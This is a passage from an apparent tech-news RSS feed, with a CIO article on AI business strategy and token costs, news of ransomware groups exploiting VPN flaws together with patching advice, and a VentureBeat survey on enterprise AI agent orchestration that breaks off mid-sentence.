<p class="wp-block-paragraph">When our customers isolate AI and define an AI strategy, it inevitably treats it like a “technological toy” to experiment with. This approach yields fragmented, orphaned initiatives that fail to scale because they are fundamentally disconnected from their core corporate objectives. What I learned is that AI is not the ultimate destination; it is a powerful catalyst. We have replaced “What can AI do for our customers?” with a more strategic question, “How does AI accelerate their existing business goals?”</p>



<p class="wp-block-paragraph">Think of AI like electricity. No modern corporation designs a standalone “electricity strategy.” Instead, all companies route it invisibly across the entire organization to illuminate offices, power production lines and drive communication. AI must be woven into the enterprise fabric in the exact same way, acting as an underlying utility that supercharges your existing operational model.</p>



<p class="wp-block-paragraph">Integrating AI into the broader business strategy also dictates how we measure success. It forces a shift away from short-term tech vanity metrics and anchors the technology into a long-term roadmap.</p>



<p class="wp-block-paragraph">When AI remains trapped within the IT department of our customers, we notice that it is relegated to a mere “software experiment.” To become a true competitive advantage, we observed that AI requires intense cross-functional orchestration. This perspective does not diminish the merit of the technical team; their expertise is fundamental for establishing the architecture, data governance and tools your enterprise requires. However, while IT builds the foundational infrastructure, it lacks the organizational authority to decide what should be built on top of it. Only the CEO or the owner of the company can step in to ensure AI leaves the “toy project” phase and integrates into the DNA of the organization.</p>



<p class="wp-block-paragraph">The requirement for top-down, executive ownership stems from three critical realities observed in the field:</p>



<ul class="wp-block-list">
<li><strong>Silo-smashing and data collaboration:</strong> True enterprise AI is data-hungry and that data lives across disparate business lines, finance, operations, marketing and customer service. Only the CEO possesses the cross-functional authority to demand that data silos be dismantled.</li>



<li><strong>Cultural transformation and fear mitigation:</strong> AI triggers widespread anxiety over job displacement across all industries and hierarchies. When relegated to an “IT project,” resistance spikes as teams view it as a threat to their livelihoods. When I saw the CEO lead this cultural shift directly is when I noticed the best results.</li>



<li><strong>C-Suite education and strategic alignment:</strong> The mandate for AI capability cannot just be delegated downward; the transformation must begin at the very top. I have conducted more than 70 presentations for the Board of Directors and C-Level teams. These people need to be actively educated not on technical code, but on specific business use cases, return on investment (ROI) frameworks and how AI resolves core organizational bottlenecks.</li>
</ul>



<p class="wp-block-paragraph"><a href="https://www.pwc.com/gx/en/issues/c-suite-insights/ceo-survey.html">PwC’s data found that only 12% of enterprises have achieved both cost and revenue benefits from AI</a>. Those elite 12% succeeded precisely because their CEOs embedded AI extensively across <em>strategic decision-making and cross-functional workflows</em>. AI is simply too disruptive and too critical to be left exclusively in the hands of technical experts. If AI is not on the CEO’s weekly agenda, it is fundamentally missing from the company’s true strategy.</p>



<h2 class="wp-block-heading"><a></a>AI as a new operational framework</h2>



<p class="wp-block-paragraph">Traditional IT systems have operated on strict algorithmic certainty: if you input a specific set of data, the system executes an immutable line of code and guarantees the same, predictable output every single time.</p>



<p class="wp-block-paragraph">AI completely breaks this paradigm. Because modern AI is built on probabilistic models, it does not execute static formulas; instead, it predicts the most likely correct response based on mathematical probabilities. This means that AI solutions carry an inherent, small percentage of uncertainty and variability. A prompt entered today might yield a slightly different, though contextually valid, output tomorrow.</p>



<p class="wp-block-paragraph">Executive leadership and organizational cultures must be actively educated to accept and navigate this fundamental shift. Traditional quality assurance frameworks for software are designed for a 100% success rate. Applying this rigid standard to AI will paralyze your initiatives, keeping 80% of your projects trapped eternally in the pilot phase. This happened to us in a food and beverage company in Latin America a couple of years ago. After this experience, we started to include conditions in our contracts that tolerate statistical margins of error and still define the project as a success.</p>



<p class="wp-block-paragraph">In terms of cost calculation, we had to teach CIOs and business managers to forget the monthly subscription model for AI and learn to manage the primary unit of exchange in modern AI: the token.</p>



<p class="wp-block-paragraph">To understand AI costs, executives must understand how large language models process data. AI models do not read full words; instead, they break text, images or code down into “pieces” called tokens. As a baseline, every 100 words process as approximately 130 to 140 tokens. Because the major AI providers use the token as their currency, <a href="https://arxiv.org/pdf/2604.22750">your business is billed dynamically based on the exact volume of tokens consumed</a> by every query submitted (input) and every response generated (output).</p>



<p class="wp-block-paragraph">Many leaders believe AI costs are fixed due to flat-rate enterprise tiers ($25–$30/user). This is a temporary illusion. These venture-capital-subsidized rates mask true operational costs and come with dynamic usage limits. Modeling long-term ROI on them guarantees a severe budget shock when true consumption pricing takes over.</p>



<p class="wp-block-paragraph">The solution is not to halt AI adoption; doing so means losing your competitive edge. Instead, the cost per token must cease to be treated as a technical footnote relegated to the IT department. It must be elevated to a core business variable.</p>



<h2 class="wp-block-heading">Risks in the AI adoption model</h2>



<p class="wp-block-paragraph">Since the beginning of the AI boom, I have seen all our customers making a critical tactical error that could cost them heavily in the medium term: they are focusing only on operational efficiency (reducing costs with AI).</p>



<p class="wp-block-paragraph">I have observed that an alarmingly high percentage of companies remain trapped in pilot phases focused exclusively on short-term cost reduction. <a href="https://www.bain.com/insights/your-ai-budget-is-growing-your-returns-arent-heres-why/">Bain &amp; Company’s global Automation and AI Pathfinder Survey </a>found that the largest share of companies measuring their AI initiatives (exactly 40%) realized cost reductions of 10% or less, heavily missing their internal targets. Our customers are putting too many resources and effort into marginal financial gains and in doing so, they are jeopardizing their most valuable assets: service quality, resilience and customer trust.</p>



<p class="wp-block-paragraph">Utilizing AI solely to slash headcount or cut operational corners is a dangerous trap that introduces severe field liabilities. A financial service organization in Latin America announced that they saved $1 million in customer support by replacing humans with AI chatbots. However, the mid-term reality revealed a different story: a damaged brand reputation due to AI errors and an influx of frustrated clients fleeing because the automated system cannot handle special cases.</p>



<p class="wp-block-paragraph">Putting a company on an extreme AI diet might make it look leaner on next quarter’s financial statement, but over-indexing on cost-cutting will ultimately leave the business too weak to compete when market dynamics shift. We are now inviting our customers to change the question from <em>“How much money will AI save us?”</em> to <em>“How will we leverage AI to exponentially increase the long-term value of our enterprise?”</em></p>



<p class="wp-block-paragraph">Deploying enterprise AI is a marathon, not a sprint, and the terrain changes with every mile. The organizations that thrive in this next era will be those that transition from fascination to discipline, treating AI not as a magic bullet for immediate savings, but as a core capability that demands rigorous governance, architectural foresight and cultural maturity. Navigating this shift requires moving past the theoretical hype and anchoring decisions in raw, field-tested reality.</p>



<p class="wp-block-paragraph">As we continue to deploy these technologies across industries, the blueprint for success is being rewritten in real time. Let’s keep this conversation going as we map out the future of business intelligence together.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI Trust Paradox: Businesses Are Racing Ahead, but Consumers Are Hesitating]]></title>
<description><![CDATA[Artificial intelligence adoption is soaring, but consumer trust lags. Transparency, human oversight, and clear AI use cases are key to closing the trust gap. Businesses are rapidly adopting AI, with 93% planning deployment, but consumer trust lags far behind: only…
Read more →
The post The AI Tru...]]></description>
<link>https://tsecurity.de/de/3691151/it-security-nachrichten/the-ai-trust-paradox-businesses-are-racing-ahead-but-consumers-are-hesitating/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691151/it-security-nachrichten/the-ai-trust-paradox-businesses-are-racing-ahead-but-consumers-are-hesitating/</guid>
<pubDate>Fri, 24 Jul 2026 11:41:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Artificial intelligence adoption is soaring, but consumer trust lags. Transparency, human oversight, and clear AI use cases are key to closing the trust gap. Businesses are rapidly adopting AI, with 93% planning deployment, but consumer trust lags far behind: only…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/the-ai-trust-paradox-businesses-are-racing-ahead-but-consumers-are-hesitating/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/the-ai-trust-paradox-businesses-are-racing-ahead-but-consumers-are-hesitating/">The AI Trust Paradox: Businesses Are Racing Ahead, but Consumers Are Hesitating</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI Trust Paradox: Businesses Are Racing Ahead, but Consumers Are Hesitating]]></title>
<description><![CDATA[Artificial intelligence adoption is soaring, but consumer trust lags. Transparency, human oversight, and clear AI use cases are key to closing the trust gap. Businesses are rapidly adopting AI, with 93% planning deployment, but consumer trust lags far behind: only 23% trust companies to use AI wi...]]></description>
<link>https://tsecurity.de/de/3691060/hacking/the-ai-trust-paradox-businesses-are-racing-ahead-but-consumers-are-hesitating/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691060/hacking/the-ai-trust-paradox-businesses-are-racing-ahead-but-consumers-are-hesitating/</guid>
<pubDate>Fri, 24 Jul 2026 11:01:16 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Artificial intelligence adoption is soaring, but consumer trust lags. Transparency, human oversight, and clear AI use cases are key to closing the trust gap. Businesses are rapidly adopting AI, with 93% planning deployment, but consumer trust lags far behind: only 23% trust companies to use AI with their data, revealing a major “AI trust gap.” […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Ransomware groups are hammering your vulnerable VPNs]]></title>
<description><![CDATA[Cybercriminals are actively exploiting a recently discovered vulnerability in Palo Alto Networks firewall and VPN appliances to deploy the Qilin ransomware strain.



A critical authentication bypass flaw (CVE-2026-0257) in Palo Alto GlobalProtect portal and gateway was the common link in a serie...]]></description>
<link>https://tsecurity.de/de/3690892/it-security-nachrichten/ransomware-groups-are-hammering-your-vulnerable-vpns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690892/it-security-nachrichten/ransomware-groups-are-hammering-your-vulnerable-vpns/</guid>
<pubDate>Fri, 24 Jul 2026 09:10:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Cybercriminals are actively exploiting a recently discovered vulnerability in Palo Alto Networks firewall and VPN appliances to deploy the Qilin <a href="https://www.csoonline.com/article/563507/what-is-ransomware-how-it-works-and-how-to-remove-it.html">ransomware</a> strain.</p>



<p class="wp-block-paragraph">A critical authentication bypass flaw (<a href="https://nvd.nist.gov/vuln/detail/cve-2026-0257">CVE-2026-0257</a>) in Palo Alto GlobalProtect portal and gateway was the common link in a series of intrusions in June, Arctic Wolf Labs warns. Exploitation of the vulnerability <a href="https://www.csoonline.com/article/4179847/attackers-exploit-palo-alto-globalprotect-flaw-days-after-disclosure.html">came within days of disclosure</a>.</p>



<p class="wp-block-paragraph">“Post-exploitation tradecraft varied across intrusions, from rapid encryption-only operations to full double-extortion, possibly suggesting multiple affiliates operating under the Qilin ransomware-as-a-service (RaaS) umbrella,” Arctic Wolf’s researchers <a href="https://arcticwolf.com/resources/blog/exploitation-of-cve-2026-0257-leads-to-qilin-ransomware/">wrote in a post on the threat</a>.</p>



<p class="wp-block-paragraph">The campaign against Palo Alto’s VPN client is part of a rising trend that sees ransomware groups increasingly targeting vulnerabilities in network edge tools and devices.</p>



<h2 class="wp-block-heading">Ransomware takes aim at the edge</h2>



<p class="wp-block-paragraph">Beyond GlobalProtect, <a href="https://www.csoonline.com/article/4079316/cross-platform-ransomware-qilin-weaponizes-linux-binaries-against-windows-hosts.html">Qilin</a> — the most active threat group in Q2 2026, responsible for 14% of attacks, according to <a href="https://www.nccgroup.com/resource-hub/cyber-threat-intelligence-reports/">NCC Group’s latest Quarterly Cyber Threat Intelligence Report</a> —  has also targeted flaws in Fortinet’s FortiGate, Citrix NetScaler, and Check Point Remote Access VPN.</p>



<p class="wp-block-paragraph">Check Point warned in June of <a href="https://www.csoonline.com/article/4182898/check-point-warns-of-ransomware-linked-attacks-exploiting-outdated-vpn-protocol.html">ransomware attacks against VPNs</a> that still use the deprecated Internet Key Exchange version 1 (IKEv1) protocol. Citrix issued patches in early July for a <a href="https://www.csoonline.com/article/4192741/new-citrixbleed-like-netscaler-flaw-sees-exploit-attempts-in-the-wild.html">CitrixBleed-like flaw</a> in its NetScalar devices that had come under attack.</p>



<p class="wp-block-paragraph">Meanwhile, Fortibleed, a massive credential-compromise campaign, <a href="https://www.csoonline.com/article/4186790/fortibleed-campaign-exposes-75000-fortinet-firewalls-worldwide.html">exposed 75,000 FortiGate firewalls in June</a>.  </p>



<p class="wp-block-paragraph">Qilin is by no means alone in increasing its operations against VPNs and other network security tools.</p>



<p class="wp-block-paragraph"><a href="https://www.csoonline.com/article/4178580/the-gentlemen-are-coming-for-your-files-and-then-your-network.html">The Gentlemen</a>, No. 2 on NCC Group’s list with 238 victims in Q2 2026, is noted for breaking into organizations through firewalls, VPNs, and other internet-exposed systems — FortiGate and Cisco products in particular.</p>



<p class="wp-block-paragraph">Akira, No. 4 on NCC Group’s list (127 victims), is also known for exploiting VPN vulnerabilities and abusing legitimate credentials, primarily versus <a href="https://www.twinstrata.com/news/akira-ransomware/">products from Ivanti, Cisco, and Fortinet</a>.</p>



<h2 class="wp-block-heading">In the line of fire</h2>



<p class="wp-block-paragraph">Network edge security devices are becoming security liabilities for enterprise security professionals, with an alarming rise in zero-day exploits arising from what experts describe as <a href="https://www.csoonline.com/article/4074945/network-security-devices-endanger-orgs-with-90s-era-flaws.html">basic and readily preventable vulnerabilities</a>.</p>



<p class="wp-block-paragraph">A range of attackers spanning opportunistic hackers to ransomware-as-a-service operators and nation-state sponsored APT (advanced persistent threat) groups are actively exploiting software vulnerabilities in edge devices to hack into corporate networks.</p>



<p class="wp-block-paragraph">“Although there has not been a material rise in ransomware volume in the last quarter, the trajectory of attacks continues upwards, and VPNs remain an increasingly attractive target,” said Matt Hull, VP and head of cyber intelligence and response at NCC Group.</p>



<p class="wp-block-paragraph">Unpatched vulnerabilities in edge devices are far from the only software bugs fueling ransomware attacks. For example, last year the <a href="https://www.csoonline.com/article/4068379/oracle-issues-emergency-patch-for-zero-day-flaw-exploited-by-cl0p-ransomware-gang.html">Clop ransomware gang hacked hundreds of companies</a> by exploiting zero-day vulnerabilities in Oracle’s E-Business Suite software.</p>



<h2 class="wp-block-heading">Edge of darkness</h2>



<p class="wp-block-paragraph">VPNs and other internet-facing edge devices remain prime targets for ransomware operators because they provide a direct route into an organization’s network.</p>



<p class="wp-block-paragraph">“Attackers may exploit an unpatched vulnerability, use stolen credentials, or target weak authentication controls,” said Alexander Leslie, a senior advisor at cyber threat intelligence firm Recorded Future. “In some cases, exploitation begins before organizations have had sufficient time to apply vendor guidance, leaving security teams with a very narrow window to respond.”</p>



<p class="wp-block-paragraph">VPN exploitation sits alongside other initial access methods, such as phishing, compromised credentials, or software supply chain attacks. The preferred attacker infiltration method varies by campaign and sector but locating security in edge devices carry particular advantages from the perspective of attackers.</p>



<p class="wp-block-paragraph">“Vulnerabilities in perimeter devices are particularly valuable to attackers because those systems are continuously exposed to the internet and can provide privileged access while bypassing some endpoint controls,” said Leslie.</p>



<p class="wp-block-paragraph">Dray Agha, senior manager of security operations at managed detection and response firm Huntress, backed up this assessment that exploiting internet-facing VPNs and edge devices remains the “dominant, volume-driven tactic” for ransomware operators because these appliances offer a “direct, publicly accessible gateway straight into the heart of corporate networks.”</p>



<p class="wp-block-paragraph">Rather than exploiting vulnerabilities in edge devices, attackers more commonly use internet-facing gateways as a means to abuse stolen credentials to break into corporate networks, according to Huntress.</p>



<p class="wp-block-paragraph">“What we see at Huntress is that the VPN is the site of initial access some 70% of the time, for advanced threat actors,” said Agha. “Overwhelmingly, however, they are not exploiting for access; rather they are using stolen credentials to authenticate to non-MFA’d [multi-factor authentication] user accounts.”</p>



<h2 class="wp-block-heading">Hardened perimeter</h2>



<p class="wp-block-paragraph">CSOs should treat their network perimeter as hostile territory by enforcing aggressive patch management, applying critical edge device updates within 24 to 48 hours, and mandating strict MFA for all access.</p>



<p class="wp-block-paragraph">Implementing zero-trust network segmentation to trap attackers and prevent lateral movement if the initial gateway is compromised also helps in making enterprise networks more resilient against attacks, Huntress’ Agha advised.</p>



<p class="wp-block-paragraph">Phishing-resistant multi-factor authentication, removal of unsupported systems, and close monitoring for unusual authentication or administrative activity also form key components in attack impact mitigation.</p>



<p class="wp-block-paragraph">Internet-facing assets that are known to be actively exploited should be prioritized as a patching priority.</p>



<p class="wp-block-paragraph">“Threat intelligence and evidence of active exploitation should help determine which vulnerabilities demand immediate action,” Recorded Future’s Leslie said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Crank up Apple’s Liquid Glass to maximum transparency and you’ll enjoy every warped second]]></title>
<description><![CDATA[Apple’s Liquid Glass interface has always been a bold, polarizing experiment in translucency. With the iOS 27 public beta, the company…
The post Crank up Apple’s Liquid Glass to maximum transparency and you’ll enjoy every warped second appeared first on MacDailyNews.]]></description>
<link>https://tsecurity.de/de/3690099/ios-mac-os/crank-up-apples-liquid-glass-to-maximum-transparency-and-youll-enjoy-every-warped-second/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690099/ios-mac-os/crank-up-apples-liquid-glass-to-maximum-transparency-and-youll-enjoy-every-warped-second/</guid>
<pubDate>Thu, 23 Jul 2026 21:37:46 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apple’s Liquid Glass interface has always been a bold, polarizing experiment in translucency. With the iOS 27 public beta, the company…</p>
<p>The post <a href="https://macdailynews.com/2026/07/23/crank-up-apples-liquid-glass-to-maximum-transparency-and-youll-enjoy-every-warped-second/">Crank up Apple’s Liquid Glass to maximum transparency and you’ll enjoy every warped second</a> appeared first on <a href="https://macdailynews.com/">MacDailyNews</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic orchestration: Enterprise AI organizations have a deployment problem, not a platform problem — and most are calling chatbots agents]]></title>
<description><![CDATA[Across 101 enterprises, agent orchestration is consolidating onto model-provider platforms — Anthropic’s Claude leads by a wide margin — chosen for the gravity of the underlying model and judged on reliable multi-step execution. But the ambition runs well ahead of the reality: most deployed “agen...]]></description>
<link>https://tsecurity.de/de/3689830/it-nachrichten/agentic-orchestration-enterprise-ai-organizations-have-a-deployment-problem-not-a-platform-problem-and-most-are-calling-chatbots-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689830/it-nachrichten/agentic-orchestration-enterprise-ai-organizations-have-a-deployment-problem-not-a-platform-problem-and-most-are-calling-chatbots-agents/</guid>
<pubDate>Thu, 23 Jul 2026 19:19:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 101 enterprises, agent orchestration is consolidating onto model-provider platforms — Anthropic’s Claude leads by a wide margin — chosen for the gravity of the underlying model and judged on reliable multi-step execution. But the ambition runs well ahead of the reality: most deployed “agents” are still chatbot wrappers, the control plane enterprises expect is deliberately hybrid to avoid lock-in, and real-time fiscal control over token burn remains the exception.</p><p>This wave of VentureBeat Pulse Research examines enterprise agent orchestration: which platforms enterprises run on, what drives the choice, what they optimize for, how they expect agent control to be structured, and — most revealingly — how orchestrated their deployed “agents” actually are and how tightly they control the cost of running them.</p><p>The central finding is a gap between orchestration ambition and orchestration reality. Enterprises are consolidating fast onto the major model platforms: Anthropic’s Claude is the primary platform for 40%, more than double any rival, followed by Microsoft (18%) and OpenAI (13%). The choice is driven by “model gravity” — native alignment with a state-of-the-art base model (21%) — and success is judged by reliable, multi-step execution (task completion reliability 32%, multi-step workflow management 28%). Yet asked to assess their portfolios honestly, 71% say a quarter or fewer of their deployed “agents” are true multi-step orchestrated workflows rather than single-prompt chatbot wrappers, and only 10% have crossed the halfway mark. The orchestration layer is being built well ahead of the orchestrated portfolio it is meant to run.</p><p>That gap shapes the architecture enterprises are putting in place. By the end of 2026 a clear majority (51%) expect a hybrid control plane — provider-native plus external orchestration — and only 6% expect to hand control to a provider-managed service, because vendor lock-in (35%) is the risk they fear most if control lives inside a model provider. Investment follows the build-out: agent workflow tooling leads the spend (34%), with security and permissions enforcement (25%) behind. And fiscal control lags throughout — more than a quarter (27%) have no real-time way to stop a runaway agent before the bill arrives.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series, this instrument focused on enterprise agent orchestration. Responses are filtered to organizations with 100 or more employees (n=101), drawn from a single June 2026 wave; because this is one wave rather than a pooled multi-month sample, the report reads cross-sectionally and does not infer month-over-month trends.</p><p>By organization size the sample is spread evenly across the enterprise bands: 100–499 employees, 2,500–9,999, and 50,000+ (21% each), with 10,000–49,999 and 500–2,499 (19% each). By role it is senior and buyer-credible: product and program managers (15%), CIO/CTO/CISO (13%), consultants and advisors (13%), and a spread of data, AI, and engineering directors and VPs, with an “Other” function at 18%. On purchasing, 81% are recommenders, influencers, or final decision-makers for AI solutions (66% recommender/influencer, 15% final decision-maker). Technology/Software is the largest industry at 44%, followed by Financial Services (17%) and Healthcare/Life Sciences (8%).</p><p>At 101 respondents the sample is robust enough to read directionally with reasonable confidence, though it remains self-selected and is not a probability sample.</p><h2>Finding 1: Orchestration runs on model-provider platforms</h2><p><b>Anthropic’s Claude leads; open frameworks are marginal</b></p><p>We asked which agent orchestration platform enterprises primarily use today. The answer concentrates on the major model providers — and on one in particular.</p><div></div><p>A note on reading these shares. As described in the methodology section, the respondents are self-selected, and this question asked them for a single primary platform — so the figures measure which platform leads each enterprise's deployment, within a self-selected audience of AI-active technical decision-makers. A sample built this way can diverge substantially from spend-weighted market measures, and each VB Pulse survey draws its own sample with its own company-size mix, so vendor figures should not be compared across our surveys either. Read these shares as a portrait of where this cohort has placed its primary orchestration bet today, rather than as market share.</p><p>The model platforms dominate. Anthropic, Microsoft, OpenAI, Google, and Amazon together account for roughly 80% of deployments (81 of 101), while the open frameworks (LangChain/LangGraph) and custom in-house builds that anchor engineering discussion sit in single digits. Anthropic’s lead — 40%, more than double the next platform — mirrors the “model gravity” selection logic in Finding 2: enterprises are choosing the orchestration layer that comes with the model they want to build on. As with the security vendors in the prior agent-security wave, the tools that define the category in technical circles are not yet where enterprise deployment concentrates. A small 3% are not orchestrating at all.</p><p>Respondents rate the platforms they run at 3.94 out of 5 overall (109 answered), with “value for money” specifically at 3.94 and “ease of implementation” the weakest score, at 3.85 — placing orchestration near the bottom of our five-tracker satisfaction range, ahead of only evaluation tooling. A rating just under 4 out of 5, from users of whom 96% plan to change their orchestration approach within the year, reads as provisional acceptance: the platforms work well enough to run today, and not well enough to stop the search for something better. The ratings sit alongside near-universal intent to change; this is a layer enterprises tolerate more than they love.</p><h2>Finding 2: Model gravity drives platform selection</h2><p><b>The base model, not the tooling, decides the platform</b></p><p>We asked what most influenced the orchestration platform choice. The single largest factor is the pull of the underlying model — though flexibility and ease of development follow close behind.</p><div></div><p>Model gravity leading is the selection-side explanation for Anthropic’s platform lead: enterprises pick the orchestration environment closest to the frontier model they have standardized on. But the next tier complicates the picture — flexibility across models and tools (17%) and ease of development (17%) say enterprises also want to avoid being trapped by that choice, foreshadowing the lock-in fear in Finding 6. Security and permissions (14%) and total cost of ownership (11%) round out a pragmatic buying logic. Performance (latency/memory) sits last at 4%, a reminder that at this stage of adoption the binding constraints are model fit and optionality, not raw speed.</p><h2>Finding 3: The job is reliable multi-step execution</h2><p><b>Enterprises just orchestration by whether it completes the work</b></p><p>We asked what enterprises optimize for — their primary success metric for orchestration. Reliability and multi-step workflow management dominate; developer- and user-facing metrics trail.</p><div></div><p>Task completion reliability (32%) and multi-step workflow management (28%) together account for 59% of responses (60 of 101): orchestration succeeds, in the enterprise view, when it reliably carries a task through multiple steps to completion. Developer productivity (17%) matters but is secondary — the inverse of its prominence in framework discussion — and end-user experience (9%) is a minor concern, consistent with orchestration being an internal execution problem rather than a UX one. This reliability-first standard is exactly what makes the Chatbot Trap finding so pointed: enterprises define success as dependable multi-step execution, yet most of their deployed “agents” do not yet do multi-step work at all.</p><p>The trap is not evenly distributed. Splitting the sample by organization size, 77% of smaller enterprises say a quarter or fewer of their agents do true multi-step work, against 62% of larger ones. Larger enterprises are meaningfully further into genuine multi-step deployment; the chatbot trap is, directionally, a mid-market condition.</p><h2>Finding 4: Consolidate, productionize, and build in-house </h2><p><b>Three strategic moves are nearly tied for the year ahead</b></p><p>We asked what major change enterprises anticipate in their orchestration strategy over the next 12 months. Three moves cluster at the top, almost evenly split.</p><div></div><p>The top three — building in-house control (25%), standardizing on one framework (24%), and moving agents from sandbox to production (23%) — are statistically indistinguishable and tell a single story: enterprises are moving from experimentation to operational consolidation. They want fewer frameworks, more production exposure, and more ownership of the control layer; only 4% expect no change. The appetite for custom in-house control planes is notable alongside the platform concentration in Finding 1 — enterprises are standardizing on model-provider platforms while simultaneously planning to wrap them in control logic they own, the hybrid posture that Finding 6 makes explicit.</p><h2>Finding 5: Nearly seven in 10 plan to switch — and the biggest group of movers has no shortlist </h2><p>The strategic change enterprises anticipate (previous finding) comes with vendor motion attached. Asked whether they plan to adopt a new, additional, or replacement agent orchestration platform in the next twelve months, more respondents are moving here than in any other layer we track.</p><div></div><p>Asked which platforms they are considering, the most common answer among those in motion is none yet: 29% of all respondents are evaluating without a shortlist, the largest single response after "not considering a change." Among named candidates, OpenAI leads at 16%, followed by LangChain/LangGraph at 12% and Anthropic at 7% — and notably, the independent frameworks draw roughly double their current usage footprint in forward consideration, the same pattern our security tracker found for specialist vendors. Read with this report's concentration and lock-in findings, the picture completes itself: the major model-platform providers hold roughly four-fifths of today's primary usage, vendor lock-in has become the leading fear, 96% anticipate a strategic change — and now the purchase intent to act on all of it, with the largest bloc of buyers still undecided. The most concentrated layer of the agentic stack is also, as of June, the least settled.</p><h2>Finding 6: Investment flows to workflow tooling</h2><p><b>Tooling and permissions lead the spend; monitoring trails</b></p><p>We asked which orchestration-related investment will grow most next year. Agent workflow tooling leads, with security and permissions enforcement behind.</p><div></div><p>Workflow tooling leading (34%) is the budget-side expression of the reliability-and-multi-step priority in Finding 3: the money is going to the machinery that strings steps together dependably. Security and permissions enforcement (25%) and scaling infrastructure (20%) follow — the investments required to take agents from sandbox into production, the strategic move in Finding 4. Monitoring and debugging draws a smaller 11%, with another 11% reporting flat budgets. The weight on tooling, permissions, and scaling over pure observability signals that enterprises are spending to build and harden orchestration, not merely to watch it run.</p><h2>Finding 7: The control plane will be hybrid — and lock-in is why</h2><p><b>Enterprises expect to split control between providers and their own layer</b></p><p>We asked where enterprises expect the primary control plane for agents to live by the end of 2026, and what worries them most if that control sits inside a model-provider platform. A clear majority expect a hybrid model — and vendor lock-in is the reason.</p><div></div><p>Hybrid control is the dominant expectation by a wide margin (51%), and only 6% expect to hand control to a provider-managed service outright. Read together, the hybrid, custom, and externally-abstracted options — every architecture that keeps control at least partly outside the provider — sum to 88% (89 of 101). The reason surfaces directly when we asked about the risk of provider-resident control: vendor lock-in leads at 35% (35 of 101), ahead of security and permissioning limitations (28%) and inflexibility across models and tools (21%). The pattern echoes the prior wave’s “don’t trust the model to police itself” posture — here, enterprises will build on a provider’s platform but decline to be governed entirely by it. The hybrid control plane is the architectural hedge against the lock-in they most fear.</p><p>The June figure asserting a preference for a hybrid control plane marks movement from earlier. In the April–May survey (n=145), only 34% expected a hybrid control plane, and a greater number (12%) expected to hand control fully to a provider-managed service. These two snapshots don’t yet measure a confirmed longitudinal trend — but the direction of the conversation is unambiguous: toward keeping control.</p><p>Lock-in is also a new arrival as a top concern. In the April–May wave, the leading concern was security and permissioning limitations (32%), with lock-in second at 24%; by June the two had traded places. The worry about provider platforms appears to be maturing from whether they can be secured to whether they can be replaced.</p><h2>Finding 8: The chatbot trap — most “agents” aren’t agents yet</h2><p><b>Enterprises admit most deployments are still chatbot wrappers</b></p><p>We asked enterprises to assess their portfolios honestly: what share of their deployed “agents” are true multi-step orchestrated workflows versus simple single-prompt chatbot wrappers. The answer is the defining finding of this wave.</p><div></div><p>This is the gap at the center of the report. Combining the bottom two bands, 71% of enterprises (72 of 101) say a quarter or fewer of their deployed “agents” are genuinely orchestrated — and just 10% (10 of 101) have crossed the halfway mark. The ambition documented in the earlier findings — model-provider platforms, reliability-first success metrics, production rollouts, a deliberate control architecture — runs well ahead of the deployed reality, which remains overwhelmingly single-prompt assistants dressed as agents. This is less a contradiction than a roadmap: the platforms, budgets, and strategies are being put in place precisely because the orchestrated portfolio is still so thin. The open question for later waves is how fast the reality closes on the ambition.</p><h2>Finding 9: Fiscal control is still reactive</h2><p><b>Only a minority can stop a runaway agent before the bill arrives</b></p><p>Finally, we asked how enterprises enforce fiscal control over agent token consumption — the risk that an autonomous loop exhausts a budget before anyone intervenes. Most rely on native caps or after-the-fact monitoring; real-time programmatic control is the exception.</p><div></div><p>More than a quarter of enterprises (27%) admit they have no real-time, programmatic way to stop an agent before a budget-breaking bill arrives — they learn of it from the logs afterward. Another 32% lean entirely on the native caps and throttles built into their primary platform, a control only as good as the provider’s tooling and one that ties back to the lock-in concern of Finding 6. The enterprises building custom gateways (23%) or exploiting cross-model routing to arbitrage cost (19%) are the ones treating token burn as an engineering problem to be controlled deterministically. As with orchestration maturity, fiscal control is an area where the operational reality lags the ambition: agents are moving toward production faster than the cost-control plane around them is being built.</p><p>It’s worth noting, a split appears according to company size: roughly one in three enterprises under 2,500 employees (34%) exercises only reactive control of agent spend, against 20% of larger enterprises — directional figures, but consistent with the chatbot-trap split. The mid-market is running the least mature agents on the least instrumented budgets.</p><h2>The bottom line: The layer is real; most of the agents aren't yet</h2><p>Organizations with 100 or more employees describe an orchestration strategy that is consolidating quickly and maturing slowly. They are standardizing — for now — on model-provider platforms, which collectively hold roughly four-fifths of primary usage, chosen for the gravity of the underlying model, and they judge success by reliable multi-step execution. Investment is flowing to workflow tooling and permissions, the strategy is to consolidate frameworks and push agents into production, and the control plane 